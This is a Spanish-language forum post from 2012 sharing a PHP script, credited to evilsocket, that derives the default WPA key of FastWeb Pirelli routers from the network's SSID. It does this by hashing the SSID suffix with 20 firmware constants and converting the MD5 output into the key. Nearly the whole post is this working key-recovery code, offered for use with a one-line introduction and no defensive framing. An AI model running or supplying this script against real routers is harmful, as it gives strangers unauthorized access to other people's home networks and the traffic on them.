FastWeb Pirelli WPA Discovery (Saber WPA redes FASTWEB-1-XXX)

Publicado por D3M0N, 11 de Noviembre de 2012, 05:18:21 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

D3M0N

11 de Noviembre de 2012, 05:18:21 PM Ultima modificación: 11 de Noviembre de 2012, 05:20:28 PM por D3M0N
Simple Script para saber la clave WPA por defecto de las redes FASTWEB-1-00193EA1B2C3:

Código: php
<?php/*************************************************************************** *   FastWeb Pirelli WPA Discovery                                         * *   by evilsocket - evilsocket@gmail.com - http://www.evilsocket.net      * *                                                                         * *   This program is free software; you can redistribute it and/or modify  * *   it under the terms of the GNU General Public License as published by  * *   the Free Software Foundation; either version 2 of the License, or     * *   (at your option) any later version.                                   * *                                                                         * *   This program is distributed in the hope that it will be useful,       * *   but WITHOUT ANY WARRANTY; without even the implied warranty of        * *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         * *   GNU General Public License for more details.                          * *                                                                         * *   You should have received a copy of the GNU General Public License     * *   along with this program; if not, write to the                         * *   Free Software Foundation, Inc.,                                       * *   59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.             * ***************************************************************************//* * SSID di partenza. */$ssid   = "FASTWEB-1-00193EA1B2C3";/* * 20 byte costanti cablati nel firmware dei Pirelli Fastweb. */$seq_20 = "\x22\x33\x11\x34\x02\x81\xFA\x22\x11\x41\x68\x11\x12\x01\x05\x22\x71\x42\x10\x66";/* * Prelevo la parte finale del SSID. */ $sn     = split( '-', $ssid );$sn     = $sn[2];/* * La divido in gruppi di due caratteri, formando un array * di 6 rappresentazioni esadecimali di byte. */preg_match_all( "/[a-f0-9]{2}/i", $sn, $sn_bytes );$sn_bytes = $sn_bytes[0];/* * Inizializzo una stringa con il valore intero di questi byte. */$str = "";for( $i = 0; $i < 6; $i++ ){    $str .= chr( hexdec( $sn_bytes[$i] ) );}echo "$str\n";/*  * Aggiungo alla stringa i 20 byte "magici". */ $str .= $seq_20;/* * Ricavo i byte dell'hash md5 della stringa */preg_match_all( "/[a-f0-9]{2}/i", md5($str), $md5_bytes );$md5_bytes = $md5_bytes[0];$long      = "";/* * Converto i byte in sequenze binarie di 8 bit. */foreach( $md5_bytes as $byte ){    $long .= sprintf( "%08s", decbin( hexdec($byte) ) );}/* * Divido in 5 gruppi di 5 bit ognuno e, qual'ora il valore intero  * di un gruppo sia maggiore di 0x0a, aggiungo 0x57. */$hex_5 = array();for( $i = 0; $i < 25; $i += 5 ){    $n       = bindec( substr( $long, $i, 5 ) );    $hex_5[] = $n > 0x0a ? $n + 0x57 : $n;}/* * Compongo la chiave. */ $wpa = "";foreach( $hex_5 as $hex ){    $wpa .= sprintf( "%02x", $hex );}print "WPA : $wpa\n";?>
Imprimir
Ir Arriba Páginas1
Acciones del Usuario